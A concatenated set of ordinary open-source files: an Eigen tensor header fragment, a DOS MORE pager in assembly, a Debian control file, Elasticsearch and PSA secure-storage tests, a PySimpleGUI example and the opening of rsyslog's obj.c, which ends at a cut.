2 * TensorOpCost::MulCost<Index>() +
TensorOpCost::DivCost<Index>());
for (int i = 0; i < NumDims; ++i) {
if (m_reverse[i]) {
compute_cost += 2 * TensorOpCost::AddCost<Index>();
}
}
return m_impl.costPerCoeff(vectorized) +
TensorOpCost(0, 0, compute_cost, false /* vectorized */, PacketSize);
}
EIGEN_DEVICE_FUNC typename Storage::Type data() const { return NULL; }
#ifdef EIGEN_USE_SYCL
// binding placeholder accessors to a command group handler for SYCL
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE void bind(cl::sycl::handler &cgh) const {
m_impl.bind(cgh);
}
#endif
protected:
Dimensions m_dimensions;
array<Index, NumDims> m_strides;
array<IndexDivisor, NumDims> m_fastStrides;
TensorEvaluator<ArgType, Device> m_impl;
ReverseDimensions m_reverse;
const Device EIGEN_DEVICE_REF m_device;
private:
struct BlockIteratorState {
BlockIteratorState()
: size(0),
count(0),
reverse(false),
block_stride(0),
block_span(0),
input_stride(0),
input_span(0) {}
Index size;
Index count;
bool reverse;
Index block_stride;
Index block_span;
Index input_stride;
Index input_span;
};
};
// Eval as lvalue
template <typename ReverseDimensions, typename ArgType, typename Device>
struct TensorEvaluator<TensorReverseOp<ReverseDimensions, ArgType>, Device>
: public TensorEvaluator<const TensorReverseOp<ReverseDimensions, ArgType>,
Device> {
typedef TensorEvaluator<const TensorReverseOp<ReverseDimensions, ArgType>,
Device> Base;
typedef TensorReverseOp<ReverseDimensions, ArgType> XprType;
typedef typename XprType::Index Index;
static const int NumDims = internal::array_size<ReverseDimensions>::value;
typedef DSizes<Index, NumDims> Dimensions;
enum {
IsAligned = false,
PacketAccess = TensorEvaluator<ArgType, Device>::PacketAccess,
BlockAccess = false,
PreferBlockAccess = false,
Layout = TensorEvaluator<ArgType, Device>::Layout,
CoordAccess = false, // to be implemented
RawAccess = false
};
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE TensorEvaluator(const XprType& op,
const Device& device)
: Base(op, device) {}
typedef typename XprType::Scalar Scalar;
typedef typename XprType::CoeffReturnType CoeffReturnType;
typedef typename PacketType<CoeffReturnType, Device>::type PacketReturnType;
static const int PacketSize = PacketType<CoeffReturnType, Device>::size;
//===- Tensor block evaluation strategy (see TensorBlock.h) -------------===//
typedef internal::TensorBlockNotImplemented TensorBlock;
//===--------------------------------------------------------------------===//
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
const Dimensions& dimensions() const { return this->m_dimensions; }
EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE Scalar& coeffRef(Index index) {
return this->m_impl.coeffRef(this->reverseIndex(index));
}
template <int StoreMode> EIGEN_DEVICE_FUNC EIGEN_STRONG_INLINE
void writePacket(Index index, const PacketReturnType& x) {
EIGEN_STATIC_ASSERT((PacketSize > 1), YOU_MADE_A_PROGRAMMING_MISTAKE)
eigen_assert(index+PacketSize-1 < dimensions().TotalSize());
// This code is pilfered from TensorMorphing.h
EIGEN_ALIGN_MAX CoeffReturnType values[PacketSize];
internal::pstore<CoeffReturnType, PacketReturnType>(values, x);
EIGEN_UNROLL_LOOP
for (int i = 0; i < PacketSize; ++i) {
this->coeffRef(index+i) = values[i];
}
}
};
} // end namespace Eigen
#endif // EIGEN_CXX11_TENSOR_TENSOR_REVERSE_H
| {
"pile_set_name": "Github"
} |
include page.inc
title MORE - a filter to paginate piped output
subttl MORE Development Specification
;-----------------------------------------------------------------------;
; ;
; Development Specification ;
; ;
; ;
; Program Name: MORE.COM Assigned to: Martin Stitt ;
; Module Name: MORE Assign date: 08/06/86 ;
; Entry Points: MORE Completed: 8/8/86 ;
; Entry From: MOS command processor ;
; Entry Method: ;
; Purpose: ;
; Refer To: ;
; Last Update: ;
; ;
; Description: Filter the charactor stream from the standard input ;
; device by counting the number of display lines and providing a pause ;
; each time the display fills up. This process must account for ;
; control codes which do not advance the cursor, lines longer than the ;
; current screen width and the current screen width (80, 40 or 20). ;
;-----------------------------------------------------------------------;
;------------------------- Revision Log -------------------------------;
; ;
; BWR 11/28/89 Marked messages for foreign language ;
; translation. ;
;----------------------------------------------------------------------;
subttl MORE macros, equates, data
page
;dos function calls
readfil equ 3fh
writfil equ 40h
stdin equ 0000
stdout equ 0001
stderr equ 0002
prnstr equ 09h
prnchr equ 02h
duphndl equ 45h
quit equ 4ch
true equ 0ffh
false equ 0
cr equ 13
lf equ 10
eof equ 1ah
tab equ 9
bell equ 7
bs equ 8
maxlins equ 25
MOS MACRO fn
mov ah,fn
int 21h
endm
PushRegSet MACRO
pushf
push ax
push bx
push cx
push dx
push di
push si
push bp
push ds
push es
ENDM
PopRegSet MACRO
pop es
pop ds
pop bp
pop si
pop di
pop dx
pop cx
pop bx
pop ax
popf
ENDM
Ljcxz MACRO jmpdest ; Long jumps
LOCAL lp1,lp2
jcxz lp1
jmp lp2
lp1: jmp jmpdest
lp2:
ENDM
Lje MACRO jmpdest
LOCAL lp1,lp2
je lp1
jmp lp2
lp1: jmp jmpdest
lp2:
ENDM
Ljz MACRO jmpdest
LOCAL lp1,lp2
jz lp1
jmp lp2
lp1: jmp jmpdest
lp2:
ENDM
Ljnz MACRO jmpdest
LOCAL lp1,lp2
jnz lp1
jmp lp2
lp1: jmp jmpdest
lp2:
ENDM
subttl main code for MORE
page
codeseg SEGMENT
ORG 0100h
ASSUME CS:CODESEG,DS:CODESEG
start:
jmp EntryPnt
ermsg1 db "MORE: Insufficient memory available! ",cr,lf ;@@XLAT
erm1ln db $ - ermsg1
moremsg db "Continued . . .$" ;@@XLAT
eolmsg db cr,lf,"$"
maxcols db ?
lincntr db 1
chrcntr db 1
;-----------------------------------------------------------------------;
; Send a crlf pair to the display ;
; ;
;-----------------------------------------------------------------------;
DispEOL PROC NEAR
lea dx,eolmsg
MOS prnstr
ret
DispEOL ENDP
subttl main procedure, filter data stream
page
;--------------------------------------------------------------------;
; Main procedure ;
; for MOS MORE command ;
;--------------------------------------------------------------------;
EntryPnt:
jmp Vrchk1 ; skip around the data
version label byte
include version.inc
vermsg db 13,10,'Improper MOS Version.',13,10,'$' ;@@XLAT
Vrchk1:
mov ah,30h
mov bx,ax ; read the MOS version number
mov cx,ax
mov dx,ax
int 21h
cmp ax,word ptr [version]
jne Vrchk2
cmp bx,word ptr [version+2]
je Vrchk3
Vrchk2:
lea dx,[vermsg] ; report mismatch
push cs
pop ds
mov ah,9
int 21h
mov al,2 ; errorlevel 2
mov ah,4ch ; and terminate
int 21h
Vrchk3:
;
; develop a paragraph count of available memory from the end of this program
; to the end of total free memory. Report and exit if not enough room for
; this program's buffer needs
;
lea bx,EndOfProg
test bx,0fh
pushf
mov cl,4
shr bx,cl ; calc paragraphs for offset
popf
jz SkipInc
inc bx
SkipInc:
mov ax,cs
add bx,ax ; add to paragraphs in segment
int 12h ; read number of Kbytes total memory
mov cl,6
shl ax,cl ; convert to paragraphs
sub ax,bx ; and find free paragraphs
cmp ax,256 ; need 256 paragraphs for 4k buffer
jae EnoughMem
lea dx,ermsg1 ; not enough memory
mov bx,stderr ; report and quit
mov cl,erm1ln
xor ch,ch
MOS writfil
MOS quit
EnoughMem:
mov ah,0fh ; read video mode to get number of
int 10h ; columns for display
mov [maxcols],ah
call DispEOL
GetData:
lea dx,EndOfProg ; read a buffer of data from standard input
mov si,dx
mov cx,4096
mov bx,stdin
MOS readfil
mov cx,ax
Ljcxz CleanExit
cld
ReadChar:
lodsb ; read a charactor from the buffer
cmp al,eof ; an test it to see if it is in the
Lje CleanExit ; set of control charactors which are
cmp al,cr ; not displayable. Special accounting
Lje Rc1 ; must be done for non-displayable control
cmp al,lf ; charactors to insure only a screen full
Lje Rc2 ; of charactors is passed at a time.
cmp al,bs
Lje Rc3
cmp al,tab
Lje Rc4
cmp al,bell
Lje WriteChar
inc [chrcntr] ; must be a displayable charactor
mov bh,[maxcols]
cmp [chrcntr],bh
jng WriteChar
inc [lincntr] ; if chrcntr > maxcols then advance the line
mov [chrcntr],1
WriteChar:
mov dl,al ; send the charactor to standard output
MOS prnchr
mov bl,al
cmp [lincntr],maxlins
jl Wc1
lea dx,moremsg ; if a screen full has been sent, put up
MOS prnstr ; message and pause for key.
mov ah,1
int 16h
DrainKeyBuf:
jz Drained ; Use BIOS to read keyboard directly rather
mov ah,0 ; than a MOS call because of redirection.
int 16h
mov ah,1
int 16h
jmp DrainKeyBuf
Drained:
mov ah,0 ; BIOS call to wait for key
int 16h
cmp al,3 ; check for ^C
je CleanExit
call DispEOL
mov [lincntr],1 ; re-init counters
mov [chrcntr],1
cmp bl,lf
je Wc1
dec si
inc cx
Wc1:
dec cx
Ljcxz GetData ; buffer empty, get another
jmp ReadChar ; read another charactor from the buffer
Rc1:
mov [chrcntr],1 ; reset charactor counter when a cr is
jmp WriteChar ; detected
Rc2:
inc [lincntr] ; advance line counter when a lf is detected
jmp WriteChar
Rc3:
dec [chrcntr] ; backup charactor counter when a bs is
Ljnz WriteChar ; detected
inc [chrcntr]
jmp WriteChar
Rc4:
mov ah,[chrcntr] ; when a tab charactor is found, anticipate
add ah,7 ; how the display function will expand the
and ah,0f8h ; tab to the next column of the set:
inc ah ; 1,9,17,25,33... (every 8th col)
mov [chrcntr],ah
jmp WriteChar
CleanExit:
xor al,al ; errorlevel 0
ExitMore:
MOS quit ; terminate program, return to MOS
EndOfProg LABEL BYTE
codeseg ENDS
END start
| {
"pile_set_name": "Github"
} |
Package: d-lan-all-in-one
Version: _VERSION_
Section: base
Priority: optional
Architecture: _ARCH_
Installed-Size: _INST_SIZE_
Depends: libprotobuf9 (_DEP_PROTOBUF_), libqt5core5a (_DEP_QTCORE_), libqt5gui5 (_DEP_QTGUI_), libqt5network5 (_DEP_QTNETWORK_), libqt5widgets5 (_DEP_QTWIDGETS_), libqt5xml5 (_DEP_QTXML_), libc6 (_DEP_LIBC_), libstdc++6 (_DEP_LIBSTDCPP_), libgcc1 (_DEP_LIBGCC_)
Maintainer: Hervé Martinet <[email protected]>
Homepage: http://www.d-lan.net
Description: A free LAN file sharing software.
The goal is to easily exchange a large amount of data
in a local area network environment like a LAN-Party.
After you launched D-LAN, you will see all other people and their
sharing automatically without special configuration.
| {
"pile_set_name": "Github"
} |
// Licensed to Elasticsearch B.V under one or more agreements.
// Elasticsearch B.V. licenses this file to you under the Apache 2.0 License.
// See the LICENSE file in the project root for more information.
//
// Code generated, DO NOT EDIT
package elasticsearch_test
import (
"fmt"
"os"
"testing"
"github.com/elastic/go-elasticsearch/v8"
)
var (
_ = fmt.Printf
_ = os.Stdout
_ = elasticsearch.NewDefaultClient
)
// <https://github.com/elastic/elasticsearch/blob/master/docs/reference/search/search.asciidoc#L10>
//
// --------------------------------------------------------------------------------
// GET /my-index-000001/_search
// --------------------------------------------------------------------------------
func Test_search_search_3e8ed6ae016eb823cb00d9035b8ac459(t *testing.T) {
es, _ := elasticsearch.NewDefaultClient()
// tag:3e8ed6ae016eb823cb00d9035b8ac459[]
res, err := es.Search(
es.Search.WithIndex("my-index-000001"),
es.Search.WithPretty(),
)
fmt.Println(res, err)
if err != nil { // SKIP
t.Fatalf("Error getting the response: %s", err) // SKIP
} // SKIP
defer res.Body.Close() // SKIP
// end:3e8ed6ae016eb823cb00d9035b8ac459[]
}
| {
"pile_set_name": "Github"
} |
/** @file
* Copyright (c) 2019, Arm Limited or its affiliates. All rights reserved.
* SPDX-License-Identifier : Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
**/
#include "val_interfaces.h"
#include "val_target.h"
#include "test_s008.h"
#ifdef ITS_TEST
#include "test_its_data.h"
#elif PS_TEST
#include "test_ps_data.h"
#endif
#define TEST_BUFF_SIZE 20
#define TEST_MAX_UINT32 0xFFFFFFFF
client_test_t test_s008_sst_list[] = {
NULL,
psa_sst_valid_offset_success,
psa_sst_invalid_offset_failure,
NULL,
};
static psa_sst_uid_t uid = UID_BASE_VALUE + 5;
static uint8_t read_buff[TEST_BUFF_SIZE];
static uint8_t write_buff[TEST_BUFF_SIZE] = {0x99, 0x01, 0x02, 0x03, 0x04, 0x23, 0xF6, 0x07, 0x08, \
0x0D, 0x70, 0xA1, 0xFF, 0xFF, 0x14, 0x73, 0x46, 0x97, 0xE8, 0xDD};
int32_t psa_sst_invalid_offset_failure(caller_security_t caller)
{
uint32_t status, j;
/* Case where offset = data_size +1 , data_len 0. Also check nothing is returned in read buff*/
val->print(PRINT_TEST, "[Check 2] Try to access data with varying invalid offset\n", 0);
memset(read_buff, 0, TEST_BUFF_SIZE);
status = SST_FUNCTION(s008_data[6].api, uid, TEST_BUFF_SIZE+1, 0, read_buff);
TEST_ASSERT_NOT_EQUAL(status, s008_data[6].status, TEST_CHECKPOINT_NUM(6));
for (j = 0; j < TEST_BUFF_SIZE; j++)
{
TEST_ASSERT_EQUAL(read_buff[j], 0x00, TEST_CHECKPOINT_NUM(7));
}
/* Case where offset = data_size , data_len= 1 Also check nothing is returned in read buff*/
status = SST_FUNCTION(s008_data[8].api, uid, TEST_BUFF_SIZE, 1, read_buff);
TEST_ASSERT_EQUAL(status, s008_data[8].status, TEST_CHECKPOINT_NUM(8));
for (j = 0; j < TEST_BUFF_SIZE; j++)
{
TEST_ASSERT_EQUAL(read_buff[j], 0x00, TEST_CHECKPOINT_NUM(9));
}
/* Case where offset = 0 , data_len > data_size Also check nothing is returned in read buff*/
status = SST_FUNCTION(s008_data[10].api, uid, 0, TEST_BUFF_SIZE+1, read_buff);
TEST_ASSERT_EQUAL(status, s008_data[10].status, TEST_CHECKPOINT_NUM(10));
for (j = 0; j < TEST_BUFF_SIZE; j++)
{
TEST_ASSERT_EQUAL(read_buff[j], 0x00, TEST_CHECKPOINT_NUM(11));
}
/* Try to access data with offset as MAX_UINT32 and length less than buffer size */
status = SST_FUNCTION(s008_data[12].api, uid, TEST_MAX_UINT32, TEST_BUFF_SIZE/2, read_buff);
TEST_ASSERT_NOT_EQUAL(status, s008_data[12].status, TEST_CHECKPOINT_NUM(12));
/* Remove the UID */
status = SST_FUNCTION(s008_data[13].api, uid);
TEST_ASSERT_EQUAL(status, s008_data[13].status, TEST_CHECKPOINT_NUM(13));
return VAL_STATUS_SUCCESS;
}
int32_t psa_sst_valid_offset_success(caller_security_t caller)
{
uint32_t status, data_len, offset = TEST_BUFF_SIZE;
/* Set data for UID */
status = SST_FUNCTION(s008_data[1].api, uid, TEST_BUFF_SIZE, write_buff, 0);
TEST_ASSERT_EQUAL(status, s008_data[1].status, TEST_CHECKPOINT_NUM(1));
/* Case where offset + datalen = data_size */
val->print(PRINT_TEST, "[Check 1] Try to access data with varying valid offset\n", 0);
while (offset > 0)
{
data_len = TEST_BUFF_SIZE - offset;
memset(read_buff, 0, TEST_BUFF_SIZE);
status = SST_FUNCTION(s008_data[2].api, uid, offset, data_len, read_buff);
TEST_ASSERT_EQUAL(status, s008_data[2].status, TEST_CHECKPOINT_NUM(2));
TEST_ASSERT_MEMCMP(read_buff, write_buff + offset, data_len, TEST_CHECKPOINT_NUM(3));
offset >>= 1;
}
offset = TEST_BUFF_SIZE - 2;
data_len = 1;
/* Case where offset + datalen < data_size */
while (offset > 0)
{
status = SST_FUNCTION(s008_data[4].api, uid, offset, data_len, read_buff);
TEST_ASSERT_EQUAL(status, s008_data[4].status, TEST_CHECKPOINT_NUM(4));
TEST_ASSERT_MEMCMP(read_buff, write_buff + offset, data_len, TEST_CHECKPOINT_NUM(5));
offset >>= 1;
data_len <<= 1;
}
return VAL_STATUS_SUCCESS;
}
| {
"pile_set_name": "Github"
} |
{
"parent": "block/cube_column",
"textures": {
"end": "biomesoplenty:block/stripped_hellbark_log_top",
"side": "biomesoplenty:block/stripped_hellbark_log"
}
}
| {
"pile_set_name": "Github"
} |
# Copyright 2015-2018 by Martin Moene
#
# gsl-lite is based on GSL: Guidelines Support Library,
# https://github.com/microsoft/gsl
#
# This code is licensed under the MIT License (MIT).
cmake_minimum_required( VERSION 3.17 FATAL_ERROR )
project( gsl-lite-test-cuda LANGUAGES CXX CUDA )
set( unit_name "gsl" )
set( PACKAGE ${unit_name}-lite )
set( PROGRAM ${unit_name}-lite )
message( STATUS "Subproject '${PROJECT_NAME}', programs '${PROGRAM}-*'")
# Test sources:
set( CUDA_SOURCES
cuda.t.cu
)
set( SOURCES
../gsl-lite.t.cpp
../assert.t.cpp
../at.t.cpp
../byte.t.cpp
../emulation.t.cpp
../issue.t.cpp
../not_null.t.cpp
../owner.t.cpp
../span.t.cpp
../string_span.t.cpp
../util.t.cpp
)
set_property( SOURCE ${SOURCES} PROPERTY LANGUAGE CUDA ) # compile .cpp files with the CUDA compiler
# Configure gsl-lite for testing:
set( GSL_CONFIG
-Dgsl_TESTING_
-Dgsl_CONFIG_CONTRACT_VIOLATION_THROWS
-Dgsl_CONFIG_CONTRACT_CHECKING_AUDIT
)
# Set NVCC-specific options:
set( NVCC_OPTIONS --Werror all-warnings -G )
# Determine compiler-specifics for MSVC, GNUC, Clang:
if( MSVC )
message( STATUS "Matched: MSVC")
set( OPTIONS /EHsc /WX /W4 )
set( DEFINITIONS -D_SCL_SECURE_NO_WARNINGS )
elseif( CMAKE_CXX_COMPILER_ID MATCHES "GNU|Clang|AppleClang" )
message( STATUS "CompilerId: '${CMAKE_CXX_COMPILER_ID}'")
set( OPTIONS ${OPTIONS}
-Werror
-Wall
-Wno-missing-braces
-Wconversion
-Wsign-conversion
-fno-elide-constructors
-fstrict-aliasing -Wstrict-aliasing=2
)
set( DEFINITIONS "" )
else()
# as is
message( STATUS "Matched: nothing")
endif()
# Have NVCC forward the host compiler options with "-Xcompiler=<opt>:
list( TRANSFORM OPTIONS PREPEND -Xcompiler= )
# Add targets and configure unit tests via CTest:
enable_testing()
function( make_cuda_test_target target sources extraOptions langVersion )
message( STATUS "Make CUDA target: '${target}'" )
add_executable ( ${target} ${sources} )
target_link_libraries ( ${target} PRIVATE ${PACKAGE}-v1 )
target_compile_options ( ${target} PRIVATE ${NVCC_OPTIONS} ${OPTIONS} ${extraOptions} )
target_compile_definitions( ${target} PRIVATE ${DEFINITIONS} ${GSL_CONFIG} )
#target_compile_features ( ${target} PRIVATE cxx_std_${langVersion} cuda_std_${langVersion} ) # apparently not supported yet
set_target_properties ( ${target} PROPERTIES CUDA_STANDARD ${langVersion} )
target_precompile_headers ( ${target} PRIVATE ../gsl-lite.t.hpp )
add_test( NAME ${target} COMMAND ${target} )
endfunction()
make_cuda_test_target( ${PROGRAM}-cuda14.t "${SOURCES};${CUDA_SOURCES}" "" 14 )
make_cuda_test_target( ${PROGRAM}-cuda14-expt.t "${SOURCES};${CUDA_SOURCES}" "--expt-relaxed-constexpr" 14 )
if( CMAKE_CUDA_COMPILER_ID MATCHES "NVIDIA" AND CMAKE_CUDA_COMPILER_VERSION VERSION_GREATER_EQUAL 11.0 )
make_cuda_test_target( ${PROGRAM}-cuda17.t "${SOURCES};${CUDA_SOURCES}" "" 17 )
make_cuda_test_target( ${PROGRAM}-cuda17-expt.t "${SOURCES};${CUDA_SOURCES}" "--expt-relaxed-constexpr" 17 )
endif()
# end of file
| {
"pile_set_name": "Github"
} |
#PySimple examples (v 3.9)
#Tony Crewe
#Oct 2018 MacOs
import PySimpleGUI as sg
import os #to work with windows OS
#sg.ChangeLookAndFeel('GreenTan')
sg.SetOptions(background_color = 'LightBlue',
element_background_color = 'LightBlue',
text_element_background_color = 'LightBlue',
font= ('Calibri', 14, 'bold'))
layout = [
[sg.Text('Enter a Name and four Marks')],
[sg.Text('Name:', size =(8,1)), sg.InputText(size = (10,1), key = '_name_')],
[sg.Text('Mark1:', size =(8,1)), sg.InputText(size = (5,1), key = '_m1_')],
[sg.Text('Mark2:', size =(8,1)), sg.InputText(size = (5,1), key = '_m2_')],
[sg.Text('Mark3:', size =(8,1)), sg.InputText(size = (5,1), key = '_m3_')],
[sg.Text('Mark4:', size =(8,1)), sg.InputText(size = (5,1), key = '_m4_')],
[sg.ReadButton('Save', size = (6,1),key = '_save_'), sg.Text('Press to Save to file')],
[sg.ReadButton('Display',size = (6,1), key = '_display_'), sg.Text('To retrieve and Display')],
[sg.Multiline(size = (24,4), key = '_multiline_', pad = (2,15))]]
window = sg.Window('Simple Average Finder').Layout(layout)
while True:
button, value = window.Read() #value is a dictionary holding name and marks (4)
if button is not None:
#initialise variables
total = 0.0
index = ''
name = value['_name_']
#get pathname to current file
dirname, filename = os.path.split(os.path.abspath(__file__))
#add desired file name for saving to path
pathname = os.path.join(dirname , 'results.txt' )
#generic catch error - blanks or wrong data types
try:
if button == '_save_':
for i in range (1,5):
index = '_m' + str(i) + '_'
#Check for values between 0 and 100
if float(value[index]) < 0 or float(value[index]) >100:
sg.Popup('Out of Range', 'Enter Marks between 0 and 100')
else:
total += float(value[index])
average = total/4
f = open(pathname, 'w')
print (name, file = f)
print (total, file = f)
print (average, file = f)
f.close()
except ValueError:
sg.Popup('Error','Check entries and try again')
if button == '_display_':
#This loads the file line by line into a list called data.
#the strip() removes whitespaces from beginning and end of each line.
try:
data = [line.strip() for line in open(pathname)]
#create single string to display in multiline object.
string = 'Name: ' + data[0] +'\nTotal: ' + str(data[1]) + '\nAverage: ' + str(data[2])
window.FindElement('_multiline_').Update(string)
except:
sg.PopupError('Error', 'Problem finding or reading file')
else:
break
| {
"pile_set_name": "Github"
} |
/* obj.c
*
* This file implements a generic object "class". All other classes can
* use the service of this base class here to include auto-destruction and
* other capabilities in a generic manner.
*
* As of 2008-02-29, I (rgerhards) am adding support for dynamically loadable
* objects. In essence, each object will soon be available via its interface,
* only. Before any object's code is accessed (including global static methods),
* the caller needs to obtain an object interface. To do so, it needs to provide
* the object name and the file where the object is expected to reside in. A
* file may not be given, in which case the object is expected to reside in
* the rsyslog core. The caller than receives an interface pointer which can
* be utilized to access all the object's methods. This method enables rsyslog
* to load library modules on demand. In order to keep overhead low, callers
* should request object interface only once in the object Init function and
* free them when they exit. The only exception is when a caller needs to
* access an object only conditional, in which case a pointer to its interface
* shall be aquired as need first arises but still be released only on exit
* or when there definitely is no further need. The whole idea is to limit
* the very performance-intense act of dynamically loading an objects library.
* Of course, it is possible to violate this suggestion, but than you should
* have very good reasoning to do so.
*
* Please note that there is one trick we need to do. Each object queries
* the object interfaces and it does so via objUse(). objUse, however, is
* part of the obj object's interface (implemented via the file you are
* just reading). So in order to obtain a pointer to objUse, we need to
* call it - obviously not possible. One solution would be that objUse is
* hardcoded into all callers. That, however, would bring us into slight
* trouble with actually dynamically loaded modules, as we should NOT
* rely on the OS loader to resolve symbols back to the caller (this
* is a feature not universally available and highly importable). Of course,
* we can solve this with a pHostQueryEtryPoint() call. It still sounds
* somewhat unnatural to call a regular interface function via a special
* method. So what we do instead is define a special function called
* objGetObjInterface() which delivers our own interface. That function
* than will be defined global and be queriable via pHostQueryEtryPoint().
* I agree, technically this is much the same, but from an architecture
* point of view it looks cleaner (at least to me).
*
* Please note that there is another egg-hen problem: we use a linked list,
* which is provided by the linkedList object. However, we need to
* initialize the linked list before we can provide the UseObj()
* functionality. That, in turn, would probably be required by the
* linkedList object. So the solution is to use a backdoor just to
* init the linked list and from then on use the usual interfaces.
*
* File begun on 2008-01-04 by RGerhards
*
* Copyright 2008-2016 Rainer Gerhards and Adiscon GmbH.
*
* This file is part of the rsyslog runtime library.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
* -or-
* see COPYING.ASL20 in the source distribution
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "config.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <assert.h>
#include <pthread.h>
/* how many objects are supported by rsyslogd? */
#define OBJ_NUM_IDS 100 /* TODO change to a linked list? info: 16 were currently in use 2008-02-29 */
#include "rsyslog.h"
#include "syslogd-types.h"
#include "srUtils.h"
#include "obj.h"
#include "stream.h"
#include "modules.h"
#include "errmsg.h"
#include "cfsysline.h"
#include "unicode-helper.h"
#include "datetime.h"
/* static data */
DEFobjCurrIf(obj) /* we define our own interface, as this is expected by some macros! */
DEFobjCurrIf(var)
DEFobjCurrIf(module)
DEFobjCurrIf(strm)
static objInfo_t *arrObjInfo[OBJ_NUM_IDS]; /* array with object information pointers */
pthread_mutex_t mutObjGlobalOp; /* mutex to guard global operations of the object system */
/* cookies for serialized lines */
#define COOKIE_OBJLINE '<'
#define COOKIE_PROPLINE '+'
#define COOKIE_ENDLINE '>'
#define COOKIE_BLANKLINE '.'
/* forward definitions */
static rsRetVal FindObjInfo(const char *szObjName, objInfo_t **ppInfo);
/* methods */
/* This is a dummy method to be used when a standard method has not been
* implemented by an object. Having it allows us to simply call via the
* jump table without any NULL pointer checks - which gains quite
* some performance. -- rgerhards, 2008-01-04
*/
static rsRetVal objInfoNotImplementedDummy(void __attribute__((unused)) *pThis)
{
return RS_RET_NOT_IMPLEMENTED;
}
/* and now the macro to check if something is not implemented
* must be provided an objInfo_t pointer.
*/
#define objInfoIsImplemented(pThis, method) \
(pThis->objMethods[method] != objInfoNotImplementedDummy)
/* construct an object Info object. Each class shall do this on init. The
* resulting object shall be cached during the lifetime of the class and each
* object shall receive a reference. A constructor and destructor MUST be provided for all
* objects, thus they are in the parameter list.
* pszID is the identifying object name and must point to constant pool memory. It is never freed.
*/
static rsRetVal
InfoConstruct(objInfo_t **ppThis, uchar *pszID, int iObjVers,
rsRetVal (*pConstruct)(void *), rsRetVal (*pDestruct)(void *),
rsRetVal (*pQueryIF)(interface_t*), modInfo_t *pModInfo)
{
DEFiRet;
int i;
objInfo_t *pThis;
assert(ppThis != NULL);
if((pThis = calloc(1, sizeof(objInfo_t))) == NULL)
ABORT_FINALIZE(RS_RET_OUT_OF_MEMORY);
pThis->pszID = pszID;
pThis->lenID = ustrlen(pszID);
pThis->pszName = ustrdup(pszID); /* it's OK if we have NULL ptr, GetName() will deal with that! */
pThis->iObjVers = iObjVers;
pThis->QueryIF = pQueryIF;
pThis->pModInfo = pModInfo;
pThis->objMethods[0] = pConstruct;
pThis->objMethods[1] = pDestruct;
for(i = 2 ; i < OBJ_NUM_METHODS ; ++i) {
pThis->objMethods[i] = objInfoNotImplementedDummy;
}
*ppThis = pThis;
finalize_it:
RETiRet;
}
/* destruct the objInfo object - must be done only when no more instances exist.
* rgerhards, 2008-03-10
*/
static rsRetVal
InfoDestruct(objInfo_t **ppThis)
{
DEFiRet;
objInfo_t *pThis;
assert(ppThis != NULL);
pThis = *ppThis;
assert(pThis != NULL);
free(pThis->pszName);
free(pThis);
*ppThis = NULL;
RETiRet;
}
/* set a method handler */
static rsRetVal
InfoSetMethod(objInfo_t *pThis, objMethod_t objMethod, rsRetVal (*pHandler)(void*))
{
pThis->objMethods[objMethod] = pHandler;
return RS_RET_OK;
}
/* destruct the base object properties.
* rgerhards, 2008-01-29
*/
static rsRetVal
DestructObjSelf(obj_t *pThis)
{
DEFiRet;
ISOBJ_assert(pThis);
free(pThis->pszName);
RETiRet;
}
/* --------------- object serializiation / deserialization support --------------- */
/* serialize the header of an object
* pszRecType must be either "Obj" (Object) or "OPB" (Object Property Bag)
*/
static rsRetVal objSerializeHeader(strm_t *pStrm, obj_t *pObj, uchar *pszRecType)
{
DEFiRet;
ISOBJ_TYPE_assert(pStrm, strm);
ISOBJ_assert(pObj);
assert(!strcmp((char*) pszRecType, "Obj") || !strcmp((char*) pszRecType, "OPB"));
/* object cookie and serializer version (so far always 1) */
CHKiRet(strm.WriteChar(pStrm, COOKIE_OBJLINE));
CHKiRet(strm.Write(pStrm, (uchar*) pszRecType, 3)); /* record types are always 3 octets */
CHKiRet(strm.WriteChar(pStrm, ':'));
CHKiRet(strm.WriteChar(pStrm, '1'));
/* object type, version and string length */
CHKiRet(strm.WriteChar(pStrm, ':'));
CHKiRet(strm.Write(pStrm, pObj->pObjInfo->pszID, pObj->pObjInfo->lenID));
CHKiRet(strm.WriteChar(pStrm, ':'));
CHKiRet(strm.WriteLong(pStrm, objGetVersion(pObj)));
/* record trailer */
CHKiRet(strm.WriteChar(pStrm, ':'));
CHKiRet(strm.WriteChar(pStrm, '\n'));
finalize_it:
RETiRet;
}
/* begin serialization of an object
* rgerhards, 2008-01-06
*/
static rsRetVal
BeginSerialize(strm_t *pStrm, obj_t *pObj)
{
DEFiRet;
ISOBJ_TYPE_assert(pStrm, strm);
ISOBJ_assert(pObj);
CHKiRet(strm.RecordBegin(pStrm));
CHKiRet(objSerializeHeader(pStrm, pObj, (uchar*) "Obj"));
finalize_it:
RETiRet;
}
/* begin serialization of an object's property bag
* Note: a property bag is used to serialize some of an objects
* properties, but not necessarily all. A good example is the queue
* object, which at some stage needs to serialize a number of its
* properties, but not the queue data itself. From the object point
* of view, a property bag can not be used to re-instantiate an object.
* Otherwise, the serialization is exactly the same.
* rgerhards, 2008-01-11
*/
static rsRetVal
BeginSerializePropBag(strm_t *pStrm, obj_t *pObj)
{
DEFiRet;
ISOBJ_TYPE_assert(pStrm, strm);
ISOBJ_assert(pObj);
CHKiRet(strm.RecordBegin(pStrm));
CHKiRet(objSerializeHeader(pStrm, pObj, (uchar*) "OPB"));
finalize_it:
RETiRet;
}
/* append a property
*/
static rsRetVal
